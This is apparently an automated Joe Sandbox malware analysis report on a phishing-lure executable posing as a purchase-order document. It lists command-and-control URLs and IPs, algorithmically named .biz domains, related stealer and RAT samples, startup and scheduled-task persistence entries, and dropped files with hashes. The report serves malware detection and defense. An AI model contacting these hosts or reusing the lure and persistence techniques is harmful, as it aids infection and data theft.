http://44.213.104.86:80/kfucjjkorih	alg.exe, 00000006.00000002.2941335928.0000000000528000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://44.221.84.105/ccrsdbhein	alg.exe, 00000006.00000003.2617837944.000000000055D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://208.100.26.245/O	alg.exe, 00000006.00000003.2479832031.000000000055D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://44.221.84.105/ngs	alg.exe, 00000006.00000003.2617837944.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2144815434.000000000055D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://13.251.16.150/ngsO	alg.exe, 00000006.00000003.2118218789.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2134781228.000000000055D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://34.246.200.160/gs?	alg.exe, 00000006.00000003.2262144345.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2243645875.000000000055D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://18.208.156.248/gs	alg.exe, 00000006.00000003.2262144345.000000000055D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://47.129.31.212/thnorfupl	alg.exe, 00000006.00000003.2098570638.0000000000528000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://172.234.222.143/qdsfjdjxkwbsc	alg.exe, 00000006.00000003.1894394555.00000000005A6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.1884187147.00000000005A6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.1911980728.00000000005A5000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.1895017111.00000000005A3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://18.141.10.107:80/ngqgkogciouo	alg.exe, 00000006.00000003.2656006967.0000000000528000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2657080595.0000000000528000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://208.100.26.245/gs?	alg.exe, 00000006.00000003.2505676462.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000006.00000003.2479832031.000000000055D000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
165.160.15.20	myups.biz	United States	19574	CSCUS	false
104.26.12.205	api.ipify.org	United States	13335	CLOUDFLARENETUS	false
3.94.10.34	ytctnunms.biz	United States	14618	AMAZON-AESUS	false
34.246.200.160	tbjrpv.biz	United States	16509	AMAZON-02US	false
172.234.222.143	przvgke.biz	United States	20940	AKAMAI-ASN1EU	false
18.208.156.248	yauexmxk.biz	United States	14618	AMAZON-AESUS	false
34.211.97.45	jpskm.biz	United States	16509	AMAZON-02US	false
208.100.26.245	gytujflc.biz	United States	32748	STEADFASTUS	false
35.164.78.200	nqwjmb.biz	United States	16509	AMAZON-02US	false
172.234.222.138	fwiwk.biz	United States	20940	AKAMAI-ASN1EU	false
165.160.13.20	unknown	United States	19574	CSCUS	false
51.195.88.199	s82.gocheapweb.com	France	16276	OVHFR	false
212.162.149.53	unknown	Netherlands	64236	UNREAL-SERVERSUS	true
44.213.104.86	qpnczch.biz	United States	14618	AMAZON-AESUS	false
44.221.84.105	jhvzpcfg.biz	United States	14618	AMAZON-AESUS	false
54.244.188.177	oshhkdluh.biz	United States	16509	AMAZON-02US	false
13.251.16.150	ifsaia.biz	United States	16509	AMAZON-02US	true
47.129.31.212	ftxlah.biz	Canada	34533	ESAMARA-ASRU	false
82.112.184.197	vjaxhpbji.biz	Russian Federation	43267	FIRST_LINE-SP_FOR_B2B_CUSTOMERSUPSTREAMSRU	false
18.141.10.107	ssbzmoy.biz	United States	16509	AMAZON-02US	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1538180
Start date and time:	2024-10-20 18:40:10 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 13m 40s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	43
Number of new started drivers analysed:	3
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe
Detection:	MAL
Classification:	mal100.spre.troj.spyw.expl.evad.winEXE@49/171@89/20
EGA Information:	Successful, ratio: 70%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
Exclude process from analysis (whitelisted): MpCmdRun.exe, DiagnosticsHub.StandardCollector.Service.exe, SIHClient.exe, conhost.exe, VSSVC.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target Native_Redline_BTC.exe, PID 4340 because it is empty
Execution Graph export aborted for target microsofts.exe, PID 2172 because there are no executed function
Execution Graph export aborted for target server_BTC.exe, PID 1804 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadFile calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Report size getting too big, too many NtWriteFile calls found.
VT rate limit hit for: RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe

Simulations

Behavior and APIs

Time	Type	Description
12:41:11	API Interceptor	842158x Sleep call for process: microsofts.exe modified
12:41:12	API Interceptor	75x Sleep call for process: alg.exe modified
12:41:15	API Interceptor	19x Sleep call for process: powershell.exe modified
12:41:16	API Interceptor	287875x Sleep call for process: TrojanAIbot.exe modified
12:41:24	API Interceptor	21x Sleep call for process: build.exe modified
12:41:56	API Interceptor	199x Sleep call for process: msdtc.exe modified
17:41:14	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk
17:41:15	Task Scheduler	Run new task: AccSys path: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
165.160.15.20	PO-DGA77_MATERIALS_SPECIFICATIONS.scr.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	myups.biz/dspvlbvnqr
	PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	myups.biz/dkwdmdeuhpg
	nL0Vxav3OB.exe	Get hash	malicious	Remcos	Browse	myups.biz/eqcq
	tyRPPK48Mk.exe	Get hash	malicious	Remcos	Browse	myups.biz/lihflvfpneg
	RFQ_PO_KMM7983972_ORDER_DETAILS.js	Get hash	malicious	AgentTesla, RedLine	Browse	myups.biz/iyyrahcc
	KY9D34Qh8d.exe	Get hash	malicious	Unknown	Browse	dxglobal.co.kr/
	XZw2GNATrR.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.triciaaprimrosevp.com/xchu/?l8=4hfd&2dvlmF=FfQWrZf65Vop6YG1TmouR8u1gr6XUpPNH67i+hNxH0jghlNI2qurbIC5tjwZKbPxMdLE
	ZparFzqF3A.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.triciaaprimrosevp.com/xchu/?UDHLeHNP=FfQWrZf65Vop6YG1TmouR8u1gr6XUpPNH67i+hNxH0jghlNI2qurbIC5tjwZKbPxMdLE&Kzr=5jUtFh
	0IwziVq2Dr.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.triciaaprimrosevp.com/xchu/?k8q=FfQWrZf65Vop6YG1TmouR8u1gr6XUpPNH67i+hNxH0jghlNI2qurbIC5tjwZKbPxMdLE&1b_HC=lVfXh
	Order-688930021178.exe	Get hash	malicious	BluStealer, ThunderFox Stealer, a310Logger	Browse	myups.biz/unwcftfsuwsxhv
104.26.12.205	Yc9hcFC1ux.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	6706e721f2c06.exe	Get hash	malicious	Remcos	Browse	api.ipify.org/
	perfcc.elf	Get hash	malicious	Xmrig	Browse	api.ipify.org/
	SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe	Get hash	malicious	RDPWrap Tool	Browse	api.ipify.org/
	SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe	Get hash	malicious	RDPWrap Tool	Browse	api.ipify.org/
	hloRQZmlfg.exe	Get hash	malicious	RDPWrap Tool	Browse	api.ipify.org/
	file.exe	Get hash	malicious	RDPWrap Tool	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
3.94.10.34	PO-DGA77_MATERIALS_SPECIFICATIONS.scr.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	gvijgjwkh.biz/lwgexo
	PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	gvijgjwkh.biz/njgjrpxmf
	nL0Vxav3OB.exe	Get hash	malicious	Remcos	Browse	ctdtgwag.biz/jdpwxuwvcofyscp
	tyRPPK48Mk.exe	Get hash	malicious	Remcos	Browse	ctdtgwag.biz/yxaoh
	RFQ_PO_KMM7983972_ORDER_DETAILS.js	Get hash	malicious	AgentTesla, RedLine	Browse	gvijgjwkh.biz/madfojp
	TENDER Qatar Imports CorporationsLTCASTK654824.B26_PDF_.exe	Get hash	malicious	FormBook	Browse	ctdtgwag.biz/va
	OjKmJJm2YT.exe	Get hash	malicious	Simda Stealer	Browse	lymyxid.com/login.php
	5AFlyarMds.exe	Get hash	malicious	Simda Stealer	Browse	lymyxid.com/login.php
	uB31aJH4M0.exe	Get hash	malicious	Simda Stealer	Browse	lymyxid.com/login.php
	M62eQtS9qP.exe	Get hash	malicious	Simda Stealer	Browse	lymyxid.com/login.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ftxlah.biz	PO-DGA77_MATERIALS_SPECIFICATIONS.scr.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	47.129.31.212
	PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	47.129.31.212
	RFQ_PO_KMM7983972_ORDER_DETAILS.js	Get hash	malicious	AgentTesla, RedLine	Browse	47.129.31.212
	TENDER Qatar Imports CorporationsLTCASTK654824.B26_PDF_.exe	Get hash	malicious	FormBook	Browse	47.129.31.212
	NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE	Get hash	malicious	AgentTesla, RedLine	Browse	47.129.31.212
	YLizzsDxrg.exe	Get hash	malicious	Gandcrab, ReflectiveLoader	Browse	206.191.152.37
	Purchase_Order_202319876.exe	Get hash	malicious	BluStealer, ThunderFox Stealer, a310Logger	Browse	206.191.152.37
	Quote_1345_rev.7.exe	Get hash	malicious	BluStealer, ThunderFox Stealer, a310Logger	Browse	206.191.152.37
	Technical_Spec.exe	Get hash	malicious	DarkCloud	Browse	206.191.152.37
	Quote_1345_rev.3.exe	Get hash	malicious	DarkCloud	Browse	206.191.152.37
oshhkdluh.biz	PO-DGA77_MATERIALS_SPECIFICATIONS.scr.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	54.244.188.177
	PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	54.244.188.177
	nL0Vxav3OB.exe	Get hash	malicious	Remcos	Browse	54.244.188.177
	tyRPPK48Mk.exe	Get hash	malicious	Remcos	Browse	54.244.188.177
	RFQ_PO_KMM7983972_ORDER_DETAILS.js	Get hash	malicious	AgentTesla, RedLine	Browse	54.244.188.177
	TENDER Qatar Imports CorporationsLTCASTK654824.B26_PDF_.exe	Get hash	malicious	FormBook	Browse	54.244.188.177
	NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE	Get hash	malicious	AgentTesla, RedLine	Browse	54.244.188.177
	TENDER Qatar Imports CorporationsLTCASTK654824.B26_PDF_.exe	Get hash	malicious	FormBook, LummaC Stealer	Browse	54.244.188.177
	YLizzsDxrg.exe	Get hash	malicious	Gandcrab, ReflectiveLoader	Browse	173.231.184.122
jpskm.biz	PO-DGA77_MATERIALS_SPECIFICATIONS.scr.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	34.211.97.45
	PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	34.211.97.45
	nL0Vxav3OB.exe	Get hash	malicious	Remcos	Browse	34.211.97.45
	tyRPPK48Mk.exe	Get hash	malicious	Remcos	Browse	34.211.97.45
	RFQ_PO_KMM7983972_ORDER_DETAILS.js	Get hash	malicious	AgentTesla, RedLine	Browse	34.211.97.45
	TENDER Qatar Imports CorporationsLTCASTK654824.B26_PDF_.exe	Get hash	malicious	FormBook	Browse	34.211.97.45
	NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE	Get hash	malicious	AgentTesla, RedLine	Browse	34.211.97.45
	TENDER Qatar Imports CorporationsLTCASTK654824.B26_PDF_.exe	Get hash	malicious	FormBook, LummaC Stealer	Browse	34.211.97.45
	YLizzsDxrg.exe	Get hash	malicious	Gandcrab, ReflectiveLoader	Browse	107.6.74.76
	Order-688930021178.exe	Get hash	malicious	BluStealer, ThunderFox Stealer, a310Logger	Browse	107.6.74.76

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	9XHFe6y4Dj.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	188.114.96.3
	WinFIG.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	WinFIG-2024.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	SentinelOculus.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	Download.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	Aquantia.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	104.21.53.8
	file.exe	Get hash	malicious	Unknown	Browse	104.21.71.28
	AxoPac.exe	Get hash	malicious	LummaC	Browse	172.67.189.211
AMAZON-02US	WinFIG.exe	Get hash	malicious	LummaC	Browse	52.222.236.120
	WinFIG-2024.exe	Get hash	malicious	LummaC	Browse	52.222.236.48
	SentinelOculus.exe	Get hash	malicious	LummaC	Browse	52.222.236.23
	bin.x86_64.elf	Get hash	malicious	Gafgyt, Mirai	Browse	52.222.183.52
	bin.i586.elf	Get hash	malicious	Gafgyt, Mirai	Browse	44.255.220.9
	arm7.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	44.227.137.234
	arm.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	15.231.47.110
	HovNfm4BLy.exe	Get hash	malicious	Credential Flusher	Browse	52.222.236.120
	HovNfm4BLy.exe	Get hash	malicious	Credential Flusher	Browse	52.222.236.80
	x.rar.elf	Get hash	malicious	Unknown	Browse	34.249.145.219
AMAZON-AESUS	N7qmK9sbZa.exe	Get hash	malicious	XenoRAT	Browse	34.229.235.165
	bin.i586.elf	Get hash	malicious	Gafgyt, Mirai	Browse	52.5.56.99
	arm.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	75.101.142.50
	https://sub.investorscabirigroup.com/4WQbos10596ktJI775idiwtbqpkk1528WGTFCWTFRKDXPVO305927/749609o14	Get hash	malicious	Phisher	Browse	52.23.111.175
	https://sub.investorscabirigroup.com/4tBfEb10596UgJc775rrkvedqhmm1528ZICWGQLYSOBMUOM389951/749609V14	Get hash	malicious	Phisher	Browse	52.23.111.175
	https://bitbucket.org/36273637sunshine/sunshine/downloads/example.exe	Get hash	malicious	Unknown	Browse	3.5.28.243
	la.bot.m68k.elf	Get hash	malicious	Mirai	Browse	100.31.134.19
	yakuza.arm5.elf	Get hash	malicious	Unknown	Browse	107.21.54.228
	yakuza.m68k.elf	Get hash	malicious	Unknown	Browse	34.192.111.159
	yakuza.ppc.elf	Get hash	malicious	Unknown	Browse	54.21.111.101
CSCUS	PO-DGA77_MATERIALS_SPECIFICATIONS.scr.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	165.160.13.20
	PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	165.160.13.20
	nL0Vxav3OB.exe	Get hash	malicious	Remcos	Browse	165.160.13.20
	tyRPPK48Mk.exe	Get hash	malicious	Remcos	Browse	165.160.13.20
	RFQ_PO_KMM7983972_ORDER_DETAILS.js	Get hash	malicious	AgentTesla, RedLine	Browse	165.160.15.20
	TENDER Qatar Imports CorporationsLTCASTK654824.B26_PDF_.exe	Get hash	malicious	FormBook	Browse	165.160.13.20
	NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE	Get hash	malicious	AgentTesla, RedLine	Browse	165.160.13.20
	firmware.sh4.elf	Get hash	malicious	Unknown	Browse	165.160.13.20
	TENDER Qatar Imports CorporationsLTCASTK654824.B26_PDF_.exe	Get hash	malicious	FormBook, LummaC Stealer	Browse	165.160.13.20
	iUAAvj0XNL.elf	Get hash	malicious	Mirai	Browse	169.233.212.251

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	gtIVRm5dHl.htm	Get hash	malicious	Unknown	Browse	104.26.12.205
	ojSv9FmOwn.lnk	Get hash	malicious	Unknown	Browse	104.26.12.205
	a1OueQJq4d.exe	Get hash	malicious	DCRat	Browse	104.26.12.205
	oIDX88LpSs.exe	Get hash	malicious	XWorm	Browse	104.26.12.205
	hKWBNgRd7p.exe	Get hash	malicious	XWorm	Browse	104.26.12.205
	N2ER4ZENF1.exe	Get hash	malicious	Unknown	Browse	104.26.12.205
	N2ER4ZENF1.exe	Get hash	malicious	Unknown	Browse	104.26.12.205
	SecuriteInfo.com.Win64.Evo-gen.14681.29745.exe	Get hash	malicious	Blank Grabber, Umbral Stealer, XWorm	Browse	104.26.12.205
	SecuriteInfo.com.Win64.MalwareX-gen.18133.14409.exe	Get hash	malicious	Discord Rat	Browse	104.26.12.205

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1353216
Entropy (8bit):	5.324406111554566
Encrypted:	false
SSDEEP:	12288:aC4VQjGARQNhifXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DB9:aOCAR0ifsqjnhMgeiCl7G0nehbGZpbD
MD5:	1657407B6C5C35D996A1A538270BC236
SHA1:	0AE8C7D585AC49C8D6A83B542B41E7267E4ADD44
SHA-256:	C1A77CE63BD1935B2A2E80AD402AF6405371A6811FE2493F4E1947147961421A
SHA-512:	D4697388FA3E9A39678C7CD63B867F973191E0E125A846A2A6D1CA61FDA6E8C32E187F54F8036052D6904525F7622BAA54C5A85F7A8CD822253132EFED43E964
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S.~.2.-.2.-.2.-n.G-.2.-n.E-J2.-n.D-.2.-.Z.,.2.-.Z.,.2.-.Z.,.2.-.J%-.2.-.2.-.2.-.[.,.2.-.[I-.2.-.2!-.2.-.[.,.2.-Rich.2.-........................PE..L...g.(c.....................6......&........0....@...........................!............................................,b..<....p...............................L..8............................L..@............0..,............................text............................... ..`.rdata...8...0...:..."..............@..@.data........p.......\..............@....rsrc....P...p...@...f..............@...................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\AutoIt3\Au3Info.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1294848
Entropy (8bit):	5.282714073827265
Encrypted:	false
SSDEEP:	12288:fNUpaKgh4Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:fCMKg2sqjnhMgeiCl7G0nehbGZpbD
MD5:	C54B87C1DF8B07DBC544B508372A6CA5
SHA1:	D1E91AA2334A48FAF3B23458CF09F18095065933
SHA-256:	B7EDD064D4781B24E9ECCE72F629D55B1082CB31D06968E36F782D4B0102E134
SHA-512:	6843EAA6DC665EED445CBCD0293C774D2527C025C5D1E931D68758B687A0A810025F110FCB1DFAC95537BE8E281362C0FA83807AF5A17FC75C6BF26EE871B650
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........jZ..9Z..9Z..9...9Q..9...9%..9...9B..9...8r..9...8K..9...8H..9S.x9W..9Z..9..9...8]..9...9[..9Z.\|9[..9...8[..9RichZ..9........PE..L...C.(c.........."......:...........\.......P....@........................... .....j-......................................$...........0..............................8...............................@............P...............................text...19.......:.................. ..`.rdata...\|...P...~...>..............@..@.data...............................@....rsrc...0...........................@..@.reloc...`...`...P...r..............@...........................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1314304
Entropy (8bit):	5.274154442970068
Encrypted:	false
SSDEEP:	12288:XMEhwdbTbXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:JKdHbsqjnhMgeiCl7G0nehbGZpbD
MD5:	7E7BF6EF84CB7A4727ABBD8A97F9753C
SHA1:	A4B312B5CABF12EE5153B64E1B9797B03B897488
SHA-256:	04212770A56E50A3405A0A522BF0E67129309D3650322F29CEF4129070ED628D
SHA-512:	1B5BB8DA9E1B70C8947B2CCE5C5FF7E0425580A240CA09BA83EDF0830DA111E4485F517107C8758F26CE46CF1110FBE866E9A171CE9F0E0D5EE7A4E4845ED4E8
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9..X...X...X..-....X..-....X..-....X...0...X...0...X...0...X... n..X...X..YX..<1.X..<1...X...Xj..X..<1...X..Rich.X..........................PE..d...G.(c.........."......J...^......Tr.........@............................. !........... .................................................,........ ..0...............................8............................................`..`............................text....H.......J.................. ..`.rdata.......`.......N..............@..@.data........ ......................@....pdata..............................@..@.rsrc...0.... ......."..............@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................

C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2203136
Entropy (8bit):	7.647042332812369
Encrypted:	false
SSDEEP:	49152:QK0eqkSR7Xgo4TiRPnLWvJ3Dmg27RnWGj:QK0pR7Xn4TiRCvJ3D527BWG
MD5:	6E5642BB2D3F98A903BFD4F1F1DA8A7A
SHA1:	319C73CEC29D5FF800892F6E8A00490BAC4C583C
SHA-256:	B3A73F713F5DC22731C440553A17AFA3464B289D3EFB6E909EA446F6E92828FD
SHA-512:	7100DAA8E61F86E24226BADBA6A261DC988E20C53D8DE7990659D5A655877716E9E81174C7C38947A8DBCB8DCFC74081A4F59727DE6EC823E39D35955C5D2FBD
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................Y;6....Y;4.x...Y;5...........................D......T...........H......H.8.....P....H......Rich...................PE..L...9.(c..........#..................d............@...........................".......!..............................................p..X...............................p...............................@...............X............................text.............................. ..`.rdata..$H.......J..................@..@.data....@... ......................@....rsrc........p......................@...................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2369024
Entropy (8bit):	7.565066675783966
Encrypted:	false
SSDEEP:	49152:YfYP1JsEDkSR7Xgo4TiRPnLWvJ3Dmg27RnWGj:IYPBR7Xn4TiRCvJ3D527BWG
MD5:	20F62D5A2E910DB4917D584FCC979C92
SHA1:	0066083B066B433DE9FF893B53BB643400484208
SHA-256:	614AB5148EC9A81B723AC21D37D5AEF5F0DB0AD6C539BC0457CB52F903F60D77
SHA-512:	9B31A7B08F61A2D798DF2DEEA63944CF96A0D4FE3538BA126768D3DDC168490252B1B069463997795AFD72AC059F21405410FD8E2265FF534FD497E23609B49C
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<y..x...x...x....~.s....\|......}.a...p..i...p..p...*p..H...q`..z...q`..a...x...s....q..[....qp.y...x...z....q..y...Richx...........PE..d...>.(c..........#..........0......(..........@..............................$.....iS$... .............................................................X........e...................n..p...................0p..(...0o...............0...............................text............................... ..`.rdata.......0......."..............@..@.data....R...0... ... ..............@....pdata...e.......f...@..............@..@.rsrc...............................@...................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1245184
Entropy (8bit):	5.123569184529853
Encrypted:	false
SSDEEP:	12288:N62SYUcknn1Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3b:KYUckn1sqjnhMgeiCl7G0nehbGZpbD
MD5:	3C6BFF44F47387DF3C65C4A22AEE1E82
SHA1:	4C995B8A02296492FE4F3677E512C97BE567A22D
SHA-256:	3295EE8C2C1E78C3A5B79857B17039B500D77F66F6F0D21D96C6CE4EDA00D6E7
SHA-512:	118FC1E33D4896FEC139E9BC868456E8625453466AF58AAE05157A3DB918BF47CD8D8D9C6E6205C109896FE3C4B5CCCAB5200F1C6D0CCE6FB5E115AAA54875D0
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........[m..5>..5>..5>OC.>..5>OC.>..5>OC.>..5>..0?..5>..1?..5>..6?..5>.>..5>..4>..5>.>..5>^.<?..5>^..>..5>..>..5>^.7?..5>Rich..5>........................PE..L.....(c..........................................@..........................@...............................................%..d....P.................................8...............................@...............t............................text.............................. ..`.rdata...^.......`..................@..@.data...l....0....... ..............@....rsrc.......P.......*..............@..@.reloc...`.......P..................@...................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1640448
Entropy (8bit):	7.1666771897496835
Encrypted:	false
SSDEEP:	49152:B+iAqSPyC+NltpScpzbtvpJoMQSq/jrQaSrDmg27RnWGj:rSktbppD527BWG
MD5:	013D37B6CF6E166750E15530E0FA8DF4
SHA1:	12723672C1CCC162962EFF71BA112BC3353AE853
SHA-256:	C89AB406CC2DABF8B758E2D1A4E1D318335EC810A6792C7FD7B9A46AA4A88D5F
SHA-512:	90AF2C78E9DF25A3321A5B747924F00C19CC9EC43F2B9DE13AB48A968002237FD4718E705782BA8493B029704B3269C9FFBB728B6AF9BEE2C8FBB34FB7CA806B
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
